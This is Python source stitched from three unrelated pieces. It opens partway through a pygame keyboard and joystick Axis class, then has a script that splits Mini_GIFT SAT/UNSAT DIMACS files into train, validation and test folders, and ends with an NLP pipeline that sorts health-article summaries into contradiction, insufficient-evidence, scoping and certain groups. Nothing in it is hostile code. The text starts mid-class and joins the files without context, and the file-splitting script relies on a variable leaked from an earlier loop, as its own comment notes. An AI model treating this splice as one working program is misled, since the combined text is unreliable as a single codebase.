        # Hold the number of keys pressed
        self._int_value = 0
        # Hold the smoothed number of keys pressed
        self._value = 0
        # Hold the total value of axis,
        # separately because of different tracking methods
        self._axis_value = 0

    def __str__(self):
        return f"Axis({self.value})"

    @property
    def value(self):
        # Keyboard (smoothed) and joystick contributions are summed, then
        # clamped to honour the [-1, 1] contract.
        return clamp(self._value + self._axis_value, -1, 1)

    def always_call(self, callback):
        return self._callbacks.connect(callback)

    def __isub__(self, callback):
        return self._callbacks.disconnect(callback)

    def update(self, dt):
        """Trigger all callbacks and updates times"""
        if self._int_value != 0:
            # Nonzero check is okay as JoyAxis already count the threshold
            self.non_zero_time += dt
            self.zero_time = 0
        else:
            self.non_zero_time = 0
            self.zero_time += dt
        if self._smooth <= 0:
            # No smoothing: track the raw key count directly.
            self._value = self._int_value
        else:
            # Move _value toward _int_value (or back toward 0 when no key is
            # held) at a rate covering the full range in `_smooth` seconds.
            dv = dt / self._smooth
            if self._int_value > 0:
                self._value += dv
            elif self._int_value < 0:
                self._value -= dv
            else:
                if self._value > 0:
                    self._value -= dv
                else:
                    self._value += dv
                if abs(self._value) <= dv:
                    # To have hard zeros
                    self._value = 0
        self._value = clamp(self._value, -1, 1)
        self._callbacks(self)

    def event(self, events):
        axis_value = 0
        any_axis = False
        for event in events:
            for pos in self._positive:
                if pos.match(event):
                    self._positive[pos] = pos.pressed(event)
            for neg in self._negative:
                if neg.match(event):
                    self._negative[neg] = neg.pressed(event)
            for axis in self._axis:
                if axis.match(event):
                    # We take the most extreme value
                    val = axis.value(event)
                    if abs(val) > abs(axis_value):
                        axis_value = val
                    any_axis = True
        # Net key direction: (#positive pressed) - (#negative pressed).
        self._int_value = sum(self._positive.values()) - sum(self._negative.values())
        if any_axis:
            self._axis_value = axis_value
class Inputs(dict, Dict[str, Union[Button, Axis]]):
    """Named collection of Buttons and Axes, updated and fed events as one."""

    def update(self, dt):
        """Trigger all callbacks and update times on every input."""
        for control in self.values():
            control.update(dt)

    def event(self, events):
        """Forward pygame events to every button and axis."""
        for control in self.values():
            control.event(events)
        if DEBUG:
            for ev in events:
                print(ev)
|
import os
from tqdm import tqdm
# --- Discover which generated DIMACS instances exist per round count --------
PATH = "./data/mini_GIFT"
#"./data/Mini_GIFT_poubelle" #"./data/mini_GIFT"
#filenames = os.listdir("./data/Mini_GIFT_poubelle")
filenames = os.listdir(PATH)
# round -> {outcome suffix -> list of instance indices seen}
dico_name = {"5":{"UNSAT.DIMACS":[], "SAT.DIMACS":[]}, "6":{"UNSAT.DIMACS":[], "SAT.DIMACS":[]}, "7":{"UNSAT.DIMACS":[], "SAT.DIMACS":[]}}
for filename in tqdm(filenames):
    if ("dico_" in filename ):
        # Underscore-separated name: field 0 is the round count, field 1 the
        # instance index, the last field SAT/UNSAT — TODO confirm layout.
        liste_interet = filename.split('_')
        dico_name[liste_interet[0]][liste_interet[-1]].append(int(liste_interet[1]))
# Highest instance index per round (only when both SAT and UNSAT exist).
dico_max = {"5":0, "6":0, "7":0}
cpt = 0
for round in ["5", '6', "7"]:  # NOTE(review): `round` shadows the builtin
    lst1 = dico_name[round]["UNSAT.DIMACS"]
    lst2 = dico_name[round]["SAT.DIMACS"]
    if len(lst1)>0 and len(lst2)>0:
        lst3 = [max(lst1), max(lst2)]
        dico_max[round] = max(lst3)
os.makedirs(PATH + "/train/dimacs/", exist_ok=True)
os.makedirs(PATH + "/train/pickle/", exist_ok=True)
os.makedirs(PATH + "/val/dimacs/", exist_ok=True)
os.makedirs(PATH + "/val/pickle/", exist_ok=True)
os.makedirs(PATH + "/test/dimacs/", exist_ok=True)
os.makedirs(PATH + "/test/pickle/", exist_ok=True)
# --- Move files into a 60/20/20 train/val/test split by instance index ------
for round in ["5", '6', "7"]:
    print(round)
    print(dico_max[round]-1)
    start_train = 0
    end_train = int(0.6*dico_max[round]-1)
    start_val = int(0.6*dico_max[round]-1)
    end_val = int(0.8*dico_max[round]-1)
    start_test = int(0.8*dico_max[round]-1)
    end_test =dico_max[round]-1
    for index in tqdm(range(start_train, end_train)):
        for end in ["UNSAT.DIMACS", "SAT.DIMACS"]:
            # NOTE(review): `liste_interet` leaks from the discovery loop
            # above, so fields 2 and 3 come from the *last* matching file —
            # this only works if those fields are identical across files.
            liste_interet2 = str(round)+"_"+str(index+1)+"_"+liste_interet[2] +"_"+liste_interet[3]+"_" + end
            os.rename(PATH+"/"+ liste_interet2, PATH+ "/train/dimacs/" +liste_interet2)
    for index in tqdm(range(start_val, end_val)):
        for end in ["UNSAT.DIMACS", "SAT.DIMACS"]:
            liste_interet2 = str(round)+"_"+str(index+1)+"_"+liste_interet[2] +"_"+liste_interet[3]+"_" + end
            os.rename(PATH+"/"+ liste_interet2, PATH+ "/val/dimacs/" +liste_interet2)
    for index in tqdm(range(start_test, end_test)):
        for end in ["UNSAT.DIMACS", "SAT.DIMACS"]:
            liste_interet2 = str(round)+"_"+str(index+1)+"_"+liste_interet[2] +"_"+liste_interet[3]+"_" + end
            os.rename(PATH+"/"+ liste_interet2, PATH+ "/test/dimacs/" +liste_interet2)
import json
from tqdm import tqdm
import pdb
import pickle
import nltk
import numpy as np
from get_model_performances import _get_entities, _get_entity_embeddings
from bart_summarization import get_closest_terms
from analysis.map_condition_phrases import read_embeddings
from evaluation.create_kg import create_entity_annotations_file, _perform_tagging, get_sentence_entities
from evaluation.create_kg import _read_entity_file, create_relation_annotations_file, produce_re_outputs, get_predicted_relations
import random
import jsonlines
from metapub import PubMedFetcher
random.seed(42)
def analyse_scoping(data, selected_so_far):
    """Collect summary sentences whose evidence covers one narrow population.

    A sentence qualifies when its annotated Population entities collapse to a
    single value that is none of the generic population terms.

    :param data: mapping of file name -> healthline article record
    :param selected_so_far: summaries already assigned to another category
    :return: list of stripped summary strings
    """
    summaries = []
    generic_terms = ['human', 'rat', 'animal', 'cell', 'men', 'women',
                     'adult humans']
    for file_name in tqdm(data):
        if 'summary_inputs' not in data[file_name]:
            continue
        if 'summary_healthline_entity_annotations' not in \
                data[file_name]['summary_inputs']:
            continue
        for sentence_tuple in data[file_name]['summary_inputs']\
                ['summary_healthline_entity_annotations']:
            summary = sentence_tuple[0]
            entities = sentence_tuple[1]
            if summary.strip() in selected_so_far or \
                    summary in selected_so_far or \
                    is_insufficient(summary):
                continue
            # BUG FIX: the original asserted on summary[0] (the first
            # character), which trivially never contains the phrase; check
            # the whole sentence. is_insufficient() above already filters
            # these, so this documents the invariant.
            assert "more research" not in summary
            populations = _get_entities(summary.split(), entities.split(),
                                        'Population')
            if len(set(populations)) != 1:
                continue
            if all([x not in populations[0] for x in generic_terms]):
                summaries.append(summary.strip())
    print(len(summaries))
    return summaries
def analyse_contradictions(data, selected_so_far):
    """Collect summary sentences that flag conflicting evidence.

    Sentences already selected, or that merely call for more research,
    are skipped.
    """
    markers = ('conflict', 'contradict', 'evidence is mixed')
    summaries = []
    for file_name in tqdm(data):
        record = data[file_name]
        if 'headings_inputs' not in record or 'summary_inputs' not in record:
            continue
        annotated = record['summary_inputs']['summary_healthline_entity_annotations']
        subtitles = record['headings_inputs']['headings_healthline_text'].keys()
        for sentence_tuple, _subtitle in zip(annotated, subtitles):
            text = sentence_tuple[0]
            if text.strip() in selected_so_far or text in selected_so_far \
                    or is_insufficient(text):
                continue
            lowered = text.lower()
            if any(marker in lowered for marker in markers):
                summaries.append(text.strip())
    print(len(summaries))
    return summaries
def analyse_insufficient(data, selected_so_far):
    """Collect summary sentences that explicitly call for more research.

    Sentences already selected, or flagged as contradictions, are skipped.
    """
    markers = ('more research', 'further research', 'additional research',
               'more human research', 'further human research',
               'additional human research')
    summaries = []
    for file_name in tqdm(data):
        record = data[file_name]
        if 'headings_inputs' not in record or 'summary_inputs' not in record:
            continue
        pairs = zip(record['summary_inputs']['summary_healthline_entity_annotations'],
                    record['headings_inputs']['headings_healthline_text'].keys())
        for sentence_tuple, _subtitle in pairs:
            text = sentence_tuple[0]
            if text.strip() in selected_so_far or text in selected_so_far \
                    or is_contradiction(text):
                continue
            lowered = text.lower()
            if any(marker in lowered for marker in markers):
                summaries.append(text.strip())
    print(len(summaries))
    return summaries
def certain_results(data, selected_so_far):
    """Collect summary sentences phrased with certainty (no hedging terms)."""
    hedges = ('more research', 'further research', 'additional research',
              'conflict', 'contradict', 'may')
    summaries = []
    for file_name in tqdm(data):
        record = data[file_name]
        if 'headings_inputs' not in record or 'summary_inputs' not in record:
            continue
        pairs = zip(record['summary_inputs']['summary_healthline_entity_annotations'],
                    record['headings_inputs']['headings_healthline_text'].keys())
        for sentence_tuple, _subtitle in pairs:
            text = sentence_tuple[0]
            if text.strip() in selected_so_far or text in selected_so_far:
                continue
            lowered = text.lower()
            if not any(hedge in lowered for hedge in hedges):
                summaries.append(text.strip())
    print(len(summaries))
    return summaries
def is_input_contradictions(data, input_pubmeds, file_name):
    """True when two input articles give different values for the same cause.

    Loads the cached per-article causal tuples from pubmed_causes.p; tuples
    whose value is 'None' are dropped while building the lookup dicts, so
    they can never contribute to a contradiction.
    """
    pubmed_causes = pickle.load(open("pubmed_causes.p", "rb"))
    pubmed_causes_dicts = {}
    for pubmed, causes in pubmed_causes.items():
        pubmed_causes_dicts[pubmed] = {
            tuple(cause[:2]): cause[2]
            for cause in causes if cause[2] != 'None'
        }
    all_causes = [pubmed_causes_dicts.get(pubmed, {})
                  for pubmed in input_pubmeds]
    # Pairwise scan: any (cause, effect) key shared between two articles with
    # differing values is a contradiction. (The original's `I == J` and
    # 'None' re-checks were dead code and have been removed.)
    for I in range(len(all_causes)):
        for J in range(I + 1, len(all_causes)):
            later = all_causes[J]
            for cause, value in all_causes[I].items():
                if cause in later and later[cause] != value:
                    return True
    return False
def is_input_not_enough(data, input_pubmeds, file_name):
    """True when the evidence boils down to a single distinct PubMed article."""
    return len(set(input_pubmeds)) == 1
def is_input_scoping(data, input_pubmeds, file_name):
    """True when the input studies report exactly one distinct population.

    Reads the Population slot (index 7) of each article's relation
    annotations. The original also loaded sentence_relation_annotations.p
    into an unused variable; that dead file read has been removed.
    """
    populations = []
    for pubmed in input_pubmeds:
        annotations = data['pubmed_sentences_annotations'].get(pubmed)
        if annotations is None:
            continue
        if 'pubmed_sentences_relation_annotations' not in annotations:
            continue
        relations = annotations['pubmed_sentences_relation_annotations'][7]
        populations += [relation[0] for relation in relations]
    return len(set(populations)) == 1
def is_input_certain(data, input_pubmeds, file_name):
    """True when no uncertainty category applies to the input articles."""
    for check in (is_input_contradictions, is_input_not_enough,
                  is_input_scoping):
        if check(data, input_pubmeds, file_name):
            return False
    return True
def input_contradictions(data, selected_so_far):
    """Collect summaries whose supporting PubMed articles contradict each other.

    Two articles contradict when they assign different effect values to the
    same (cause, effect) pair, except that {'decreases','controls'} and
    {'increases','satisfies'} are each treated as compatible families.
    """
    pubmed_causes = pickle.load(open("pubmed_causes.p", "rb"))
    # {pubmed: {(cause, effect): value}}, dropping 'None' values up front.
    cause_maps = {}
    for pubmed, causes in pubmed_causes.items():
        cause_maps[pubmed] = {
            tuple(cause[:2]): cause[2]
            for cause in causes if cause[2] != 'None'
        }

    def _contradicts(cause_dicts):
        """True when two articles give incompatible values for one cause."""
        compatible = ({'decreases', 'controls'}, {'increases', 'satisfies'})
        for I in range(len(cause_dicts)):
            for J in range(I + 1, len(cause_dicts)):
                for cause, v1 in cause_dicts[I].items():
                    v2 = cause_dicts[J].get(cause)
                    if v2 is None or v2 == v1:
                        continue
                    if any(v1 in fam and v2 in fam for fam in compatible):
                        continue
                    return True
        return False

    summaries = []
    for file_name in tqdm(data):
        if 'summary_inputs' not in data[file_name]:
            continue
        if 'summary_pubmed_articles' not in data[file_name]['summary_inputs']:
            continue
        articles = data[file_name]['summary_inputs']['summary_pubmed_articles']
        for summary, pubmeds in articles.items():
            if summary.strip() in selected_so_far or len(pubmeds) == 0:
                continue
            # BUG FIX: the original break-cascade also broke out of this
            # summary loop on the first hit, so at most one contradicting
            # summary per file was recorded; every summary is examined now.
            if _contradicts([cause_maps.get(p, {}) for p in pubmeds]):
                summaries.append(summary.strip())
    print(len(summaries))
    return summaries
def input_not_enough(data, selected_so_far):
    """Collect summaries backed by only a single distinct PubMed article."""
    summaries = []
    for file_name in tqdm(data):
        record = data[file_name]
        if 'summary_inputs' not in record:
            continue
        if 'summary_pubmed_articles' not in record['summary_inputs']:
            continue
        articles = record['summary_inputs']['summary_pubmed_articles']
        for summary, pubmeds in articles.items():
            if summary.strip() in selected_so_far or len(pubmeds) == 0:
                continue
            if len(set(pubmeds)) == 1:
                summaries.append(summary.strip())
    print(len(summaries))
    return summaries
def input_scoping(data, selected_so_far):
    """Collect summaries whose input articles only studied one specific,
    non-generic population (e.g. only 'mice').

    Side effect: pickles the population found per selected summary to
    scoping_populations.p.
    """
    summaries = []
    subtitles = []
    relation_annotations = pickle.load(open("sentence_relation_annotations.p",\
            "rb"))
    sentence_populations = {}
    for file_name in tqdm(data):
        if 'summary_inputs' not in data[file_name]:
            continue
        if 'summary_pubmed_articles' not in data[file_name]['summary_inputs']:
            continue
        for summary,pubmeds in data[file_name]['summary_inputs']\
                ['summary_pubmed_articles'].items():
            if summary.strip() in selected_so_far:
                continue
            if len(pubmeds) == 0:
                continue
            # Only summaries with known relation annotations are considered.
            if summary.strip() not in relation_annotations:
                continue
            #populations = \
            #    [relation_annotations[summary.strip()][1][7][i][0]\
            #    for i in range(len(\
            #    relation_annotations[summary.strip()][1][7]))]
            populations = []
            # Gather Population entities from every supporting article.
            for p in data['pubmed_sentences_annotations']:
                if p not in pubmeds:
                    continue
                current_population = []
                if 'pubmed_sentences_entity_annotations' not in \
                        data['pubmed_sentences_annotations'][p]:
                    continue
                for sent_ann in data['pubmed_sentences_annotations'][p]\
                        ['pubmed_sentences_entity_annotations']:
                    sent,ann = sent_ann[0], sent_ann[1]
                    current_population += _get_entities(sent.split(),\
                            ann.split(),'Population')
                populations += current_population
            if len(populations) == 0:
                continue
            # Generic population terms do not count as narrow scoping.
            if any([x in populations for x in ['men','women',\
                    'participants','human','humans','subjects']]):
                continue
            #if any([[x in y for y in populations] for x in ['healthy']]):
            #    continue
            if len(set(populations)) <= 1:
                summaries.append(summary.strip())
                sentence_populations[summary.strip()] = \
                        list(set(populations))[0]
    print(len(summaries))
    pickle.dump(sentence_populations, open("scoping_populations.p","wb"))
    return summaries
def input_certain(data, selected_so_far):
    """Collect every unselected summary that has at least one PubMed source."""
    summaries = []
    for file_name in tqdm(data):
        record = data[file_name]
        if 'summary_inputs' not in record:
            continue
        if 'summary_pubmed_articles' not in record['summary_inputs']:
            continue
        articles = record['summary_inputs']['summary_pubmed_articles']
        summaries.extend(
            summary.strip()
            for summary, pubmeds in articles.items()
            if len(pubmeds) > 0 and summary.strip() not in selected_so_far
        )
    print(len(summaries))
    return summaries
def get_sentence_annotations():
    """Dump categorized summaries as word-per-line 'O' tags for annotation.

    Reads categorized_output_summaries.p and writes
    categorized_entity_input.txt (one token + tag per line, blank line
    between sentences).
    """
    dictionary = pickle.load(open("categorized_output_summaries.p","rb"))
    out = open("categorized_entity_input.txt","w")
    for sentences in dictionary.values():
        for sentence in sentences:
            for word in nltk.tokenize.word_tokenize(sentence):
                out.write(word + " O\n")
            out.write("\n")
    out.close()
def is_contradiction(sentence):
    """True when the sentence uses conflicting-evidence phrasing."""
    lowered = sentence.lower()
    markers = ('conflict', 'contradict', 'evidence is mixed', 'mixed results')
    return any(marker in lowered for marker in markers)
def is_insufficient(sentence):
    """True when the sentence calls for more/further research."""
    lowered = sentence.lower()
    markers = ('more research', 'further research', 'additional research',
               'more human research', 'further human research',
               'additional human research', 'more high - quality studies')
    return any(marker in lowered for marker in markers)
def check_outputs(input_file_name, output_file_name, incorrect_input,
                  incorrect_output):
    """Cross-check generated outputs against their input control codes.

    Inputs are tagged #1..#4: contradiction outputs should pair with #4,
    insufficient-evidence outputs with #2, and plain outputs with #1 or #3.
    Mismatched pairs are written to the two 'incorrect' files.
    """
    output_lines = open(output_file_name, "r").readlines()
    input_lines = open(input_file_name, "r").readlines()
    mismatches = []
    for output, input in zip(output_lines, input_lines):
        contradiction = is_contradiction(output.strip())
        insufficient = is_insufficient(output.strip())
        matches_code = (
            (contradiction and input.startswith("#4"))
            or (insufficient and input.startswith("#2"))
            or (not (contradiction or insufficient)
                and (input.startswith("#1") or input.startswith("#3")))
        )
        if not matches_code:
            mismatches.append((input, output))
    print(len(mismatches))
    f_in = open(incorrect_input, "w")
    f_out = open(incorrect_output, "w")
    for input, output in mismatches:
        f_in.write(input.strip() + "\n")
        f_out.write(output.strip() + "\n")
    f_in.close()
    f_out.close()
def check_pubmed_outputs(data):
    """Categorise PubMed sentences that mention a known causal pair.

    A sentence is kept when it contains both members of some non-'None'
    (cause, effect) tuple cached for its article; kept sentences are then
    bucketed as contradiction / not_enough / certain and pickled to
    categorized_pubmed_summaries.p.
    """
    pubmed_causes = pickle.load(open("pubmed_causes.p","rb"))
    consider_sentences = set()
    for pubmed in tqdm(data['pubmed_sentences_annotations']):
        if 'pubmed_sentences_entity_annotations' not in data['pubmed_sentences_annotations'][pubmed]:
            continue
        for sentence_tuple in data['pubmed_sentences_annotations']\
                [pubmed]['pubmed_sentences_entity_annotations']:
            sentence, _ = sentence_tuple
            current_causes = pubmed_causes.get(pubmed,set())
            # Only (cause, effect) pairs with a real value qualify.
            cause_consider = set([tuple(instances[:2]) for instances\
                    in current_causes if instances[2]!='None'])
            if any([cause[0] in sentence and cause[1] in sentence\
                    for cause in cause_consider]):
                consider_sentences.add(sentence)
    categorized_pubmed_outputs = {}
    for sentence in consider_sentences:
        if is_contradiction(sentence):
            categorized_pubmed_outputs['contradiction'] = \
                    categorized_pubmed_outputs.setdefault('contradiction',[])+\
                    [sentence]
        elif is_insufficient(sentence):
            categorized_pubmed_outputs['not_enough'] = \
                    categorized_pubmed_outputs.setdefault('not_enough',[])+\
                    [sentence]
        else:
            categorized_pubmed_outputs['certain'] = \
                    categorized_pubmed_outputs.setdefault('certain',[])+\
                    [sentence]
    pickle.dump(categorized_pubmed_outputs,open("categorized_pubmed_"+\
            "summaries.p","wb"))
def gather_multi_sentence_summaries(data):
    """Build train/test data for multi-sentence summary generation.

    Pipeline (all paths are fixed, side effects are pickles and text files):
      1. Group healthline heading sentences that have distant-mapped pubmeds.
      2. Categorize each group (contradiction / not_enough / certain).
      3. Tag entities and predict relations with external model helpers.
      4. Write augmented training pairs (multi_train.source/.target).
      5. Write test inputs from clustered extractive summaries
         (multi_test.source / multi_test.pubmed).
    """
    sentences_pubmeds = {}
    sentence_string_pubmeds = {}
    grouped_sentences = []
    categorized_sentences = {}
    sentence_categories = {}
    category_counts = {}
    sentence_sentence_splits = {}
    sentence_file_names = {}
    # Step 1: collect sentence groups per healthline heading.
    for file_name in data:
        if 'headings_inputs' not in data[file_name]:
            continue
        if 'distant_mapped_sentences' not in data[file_name]:
            continue
        for heading in data[file_name]['headings_inputs']['headings_healthline_text']:
            sentences = data[file_name]['headings_inputs']['headings_healthline_text'][heading]
            if len([x for x in sentences if x != '' and x in data[file_name]['distant_mapped_sentences']]) == 0:
                continue
            # Keep only non-empty sentences with a distant pubmed mapping.
            sentences = [x for x in sentences if x != '' and x in data[file_name]['distant_mapped_sentences']]
            pubmeds = [data[file_name]['distant_mapped_sentences'][x] for x in sentences]
            grouped_sentences.append(" ".join(sentences).strip())
            sentences_pubmeds[tuple(sentences)] = pubmeds
            sentence_string_pubmeds[" ".join(sentences).strip()] = pubmeds
            sentence_file_names[tuple(sentences)] = file_name
            sentence_sentence_splits[" ".join(sentences).strip()] = sentences
            # Step 2: category of the concatenated group.
            sentence_category = "certain"
            if is_contradiction(" ".join(sentences).strip()):
                sentence_category = "contradiction"
            elif is_insufficient(" ".join(sentences).strip()):
                sentence_category = "not_enough"
            sentence_categories[" ".join(sentences).strip()] = sentence_category
            category_counts[sentence_category] = category_counts.setdefault(sentence_category, 0) + 1
            categorized_sentences[sentence_category] = categorized_sentences.setdefault(sentence_category, []) + [" ".join(sentences).strip()]
    # Sanity check: groups must match the previously pickled mapping.
    old_sentences_pubmeds = pickle.load(open("multi_sentences_pubmeds.p", "rb"))
    pickle.dump(categorized_sentences, open("output_categorized_multi_sentences.p", "wb"))
    pickle.dump(sentences_pubmeds, open("multi_sentences_pubmeds.p", "wb"))
    assert sentences_pubmeds == old_sentences_pubmeds
    pickle.dump(sentence_file_names, open("multi_sentence_file_names.p", "wb"))
    # Step 3: external NER + relation-extraction round trip.
    create_entity_annotations_file(sum(sentence_sentence_splits.values(), []),
                                   "/data/rsg/nlp/darsh/aggregator/crawl_websites/" + "NUT/model_sentences.txt")
    _perform_tagging("demo.model_evaluation_decode.config")
    machine_r_sentences, machine_labels = _read_entity_file(
        "/data/rsg/nlp/darsh/aggregator/crawl_websites" "/NUT/model_sentences_out.txt")
    machine_sentence_entities = get_sentence_entities(machine_r_sentences, machine_labels)
    machine_causes_input, machine_contains_input = create_relation_annotations_file(machine_sentence_entities, "model")
    machine_causes_output = produce_re_outputs("model_causes.jsonl", "t3_causes")
    machine_contains_output = produce_re_outputs("model_contains.jsonl", "t3_contains")
    machine_causes = get_predicted_relations(machine_causes_input, machine_causes_output)
    machine_contains = get_predicted_relations(machine_contains_input, machine_contains_output)
    number_of_good_sentences = 0
    good_category_counts = {}
    # All entity surface forms seen by the tagger, per entity type.
    food_terms = sum([machine_sentence_entities[x].get('Food', []) for x in machine_sentence_entities.keys()], [])
    nutrition_terms = sum([machine_sentence_entities[x].get('Nutrition', []) for x in machine_sentence_entities.keys()], [])
    condition_terms = sum([machine_sentence_entities[x].get('Condition', []) for x in machine_sentence_entities.keys()], [])
    embeddings = read_embeddings()
    food_closest = get_closest_terms(food_terms, embeddings)
    nutr_closest = get_closest_terms(nutrition_terms, embeddings)
    cond_closest = get_closest_terms(condition_terms, embeddings)
    train_source = open("multi_train.source", "w")
    train_target = open("multi_train.target", "w")
    # Per-category augmentation factor (rarer categories get more synonyms).
    multiplier = {'certain': 0, 'not_enough': 14, 'contradiction': 44}
    data_point_counts = {}
    sentence_tuple_causes = {}
    for sentence_tuples in sentence_file_names:
        sentence_tuple_causes[sentence_tuples] = []
        for sentence in sentence_tuples:
            sentence_tuple_causes[sentence_tuples].append([machine_causes.get(sentence, []),
                                                           machine_contains.get(sentence, [])])
    pickle.dump(sentence_tuple_causes, open("sentence_tuple_causes.p", "wb"))
    # Step 4: emit training pairs for groups with at least one relation.
    for grouped_sentence in grouped_sentences:
        split_sentences = sentence_sentence_splits[grouped_sentence]
        good_candidate = False
        for sentence in split_sentences:
            sentence_cause = machine_causes.get(sentence, [])
            sentence_contain = machine_contains.get(sentence, [])
            if not (len(sentence_cause) == 0 and len(sentence_contain) == 0):
                good_candidate = True
                break
        if good_candidate:
            good_category_counts[sentence_categories[grouped_sentence]] = good_category_counts.setdefault(sentence_categories[grouped_sentence], 0) + 1
            number_of_good_sentences += 1
        else:
            continue
        net_input = []
        net_output = []
        food_names = []
        cond_names = []
        nutr_names = []
        for sentence in split_sentences:
            food_names += machine_sentence_entities[sentence].get('Food', [])
            cond_names += machine_sentence_entities[sentence].get('Condition', [])
            nutr_names += machine_sentence_entities[sentence].get('Nutrition', [])
            sentence_causes = machine_causes.get(sentence, [])
            sentence_contains = machine_contains.get(sentence, [])
            # Order relations by where their object appears in the sentence.
            indices = [sentence.index(c[1]) for c in sentence_contains]
            indices = np.argsort(indices)
            sentence_contains = [sentence_contains[i] for i in indices]
            indices = [sentence.index(c[1]) for c in sentence_causes]
            indices = np.argsort(indices)
            sentence_causes = [sentence_causes[i] for i in indices]
            if len(sentence_causes) == 0 and len(sentence_contains) == 0:
                continue
            # Linearize relations into the <blank>-delimited input format.
            good_text = "<blank> "
            good_text += (sentence_contains + sentence_causes)[0][0] + " "
            for c in sentence_contains:
                good_text += "<contains> " + c[1] + " "
            for c in sentence_causes:
                good_text += "<" + c[2] + "> " + c[1] + " "
            good_text += "<blank>"
            net_input.append(good_text)
            net_output.append(sentence)
        if len(net_input) == 0:
            continue
        train_input = " |SEP| ".join(net_input).strip()
        train_output = " |SEP| ".join(net_output).strip()
        # Prepend a same-category style exemplar; cap total length at 220 tokens.
        sample_text = random.choice(categorized_sentences[sentence_categories[grouped_sentence]])
        if len(sample_text.split()) + len(train_input.split()) + len(train_output.split()) > 220:
            continue
        data_point_counts[sentence_categories[grouped_sentence]] = data_point_counts.setdefault(sentence_categories[grouped_sentence], 0) + 1
        train_source.write(sample_text + " |SEN| " + train_input + "\n")
        train_target.write(train_output + "\n")
        # Augment by swapping each entity for its nearest-embedding neighbors.
        for entity_terms, entity_closest in zip([food_names, nutr_names, cond_names],
                                                [food_closest, nutr_closest, cond_closest]):
            for entity_term in entity_terms:
                entity_closests = entity_closest[entity_term][:multiplier[sentence_categories[grouped_sentence]]]
                for entity_clos in entity_closests:
                    sample_text = random.choice(categorized_sentences[sentence_categories[grouped_sentence]])
                    n_train_input = train_input.replace(entity_term, entity_clos)
                    n_train_output = train_output.replace(entity_term, entity_clos)
                    if len(sample_text.split()) + len(n_train_input.split()) + len(n_train_output.split()) > 220:
                        continue
                    train_source.write(sample_text + " |SEP| " + n_train_input + "\n")
                    train_target.write(n_train_output + "\n")
                    data_point_counts[sentence_categories[grouped_sentence]] = data_point_counts.setdefault(sentence_categories[grouped_sentence], 0) + 1
    train_source.close()
    train_target.close()
    print(number_of_good_sentences)
    print(category_counts)
    print(good_category_counts)
    print(data_point_counts)
    # Step 5: build the test set from clustered extractive summaries.
    pubmed_causes = pickle.load(open("pubmed_causes.p", "rb"))
    test_cat_counts = {}
    cluster_extractive_multi_summaries = jsonlines.open("cluster_extractive_multi_summaries.jsonl", "r")
    input_cluster_text = open("multi_test.source", "w")
    pubmed_multi_test = open("multi_test.pubmed", "w")
    metadata = json.load(open("annotated_metadata5.json", "r"))
    for data_point in cluster_extractive_multi_summaries:
        file_name = data_point['file_name']
        pubmed_sentences = metadata[file_name]['pubmed_sentences']
        pubmed_titles = {}
        pubmed_title_representations = {}
        cluster_sentences = data_point['clustered_sentences']
        cluster_numbers = data_point['cluster_numbers']
        current_pubmeds = list(set(sum(sentences_pubmeds[tuple(data_point['gold'][0])], [])))
        # Skip instances whose clusters cite pubmeds outside the gold set.
        ignore_instance = False
        for cluster_sentence in cluster_sentences:
            if cluster_sentence[0][-3] not in current_pubmeds:
                ignore_instance = True
                break
        if ignore_instance:
            continue
        current_causes = []
        for pubmed in current_pubmeds:
            for p_c in pubmed_causes.get(pubmed, []):
                current_causes.append(p_c + [pubmed])
        # Embed each pubmed title for the cluster assignment below.
        for pubmed in current_pubmeds:
            pubmed_titles[pubmed] = " ".join(pubmed_sentences[pubmed][0][0]).strip()
            pubmed_title_representations[pubmed] = _get_entity_embeddings(pubmed_titles[pubmed], embeddings)
        # Two different pubmeds asserting conflicting relations for the same
        # entity pair mark the instance as a contradiction.
        is_cont = False
        for i, current_cause1 in enumerate(current_causes):
            for j, current_cause2 in enumerate(current_causes):
                if current_cause1[-1] == current_cause2[-1]:
                    continue
                if current_cause1[:2] == current_cause2[:2] and current_cause1[2] != current_cause2[2]:
                    is_cont = True
                    cluster_sentences = [[current_cause1, "", ""], [current_cause2, "", ""]]
                    break
            if is_cont:
                break
        food_name = data_point['food_name']
        category_name = 'certain'
        if is_cont:
            category_name = 'contradiction'
        candidate_titles = []
        for cause in cluster_sentences:
            candidate_titles.append(pubmed_title_representations.get(cause[0][-3], np.array([0] * 50)))
        # Assign every pubmed to the cluster with the closest title embedding.
        cluster_pubmeds = {}
        for pubmed in current_pubmeds:
            pubmed_repr = pubmed_title_representations.get(pubmed, np.array([0] * 50))
            dot_products = [np.dot(pubmed_repr, p) for p in candidate_titles]
            best_index = dot_products.index(max(dot_products))
            cluster_pubmeds[best_index] = cluster_pubmeds.setdefault(best_index, []) + [pubmed]
        clusters_pubmeds_list = []
        for ind in range(len(cluster_sentences)):
            clusters_pubmeds_list.append(cluster_pubmeds.get(ind, []))
        pubmed_multi_test.write(str(clusters_pubmeds_list) + "\n")
        sample_text = random.choice(categorized_sentences[category_name])
        test_cat_counts[category_name] = test_cat_counts.setdefault(category_name, 0) + 1
        net_input = []
        for cluster_sentence in cluster_sentences:
            sent = cluster_sentence[0]
            if food_name != "":
                sent[0] = food_name
            curr_input = "<blank> " + sent[0] + " <" + sent[2].split()[0] + "> " + sent[1] + " <blank>"
            net_input.append(curr_input)
        input_text = " |SEN| ".join(net_input).strip()
        input_cluster_text.write(sample_text + " |SEP| " + input_text + "\n")
    input_cluster_text.close()
    pubmed_multi_test.close()
    print(test_cat_counts)
if __name__ == "__main__":
    data = json.load(open("annotated_metadata5.json", "r"))
    # Earlier pipeline stages, toggled by hand; kept for reference.
    #gather_multi_sentence_summaries(data)
    #import sys; sys.exit()
    #a_summaries = analyse_insufficient(data,[])
    #output_scoping_summaries = analyse_scoping(data, set(a_summaries))
    #c_summaries = analyse_contradictions(data, set(output_scoping_summaries+a_summaries))
    #certain_summaries = certain_results(data, set(output_scoping_summaries+c_summaries+a_summaries))
    #dictionary_outputs = {'contradiction':c_summaries,'not_enough':a_summaries,'certain':certain_summaries,'scoping':output_scoping_summaries}
    #pickle.dump(dictionary_outputs,open("categorized_output_summaries.p","wb"))
    #input_contradictions(data)

    # Categorize every input summary; each step excludes earlier categories.
    ne_summaries = input_not_enough(data, [])
    scoping_summaries = input_scoping(data, set(ne_summaries))
    contradiction_summaries = input_contradictions(data,
                                                   set(ne_summaries + scoping_summaries))
    certain_summaries = input_certain(data, set(ne_summaries +
                                                scoping_summaries + contradiction_summaries))
    print(len(ne_summaries), len(scoping_summaries),
          len(contradiction_summaries), len(certain_summaries))
    print(len(set(ne_summaries + scoping_summaries + contradiction_summaries)))
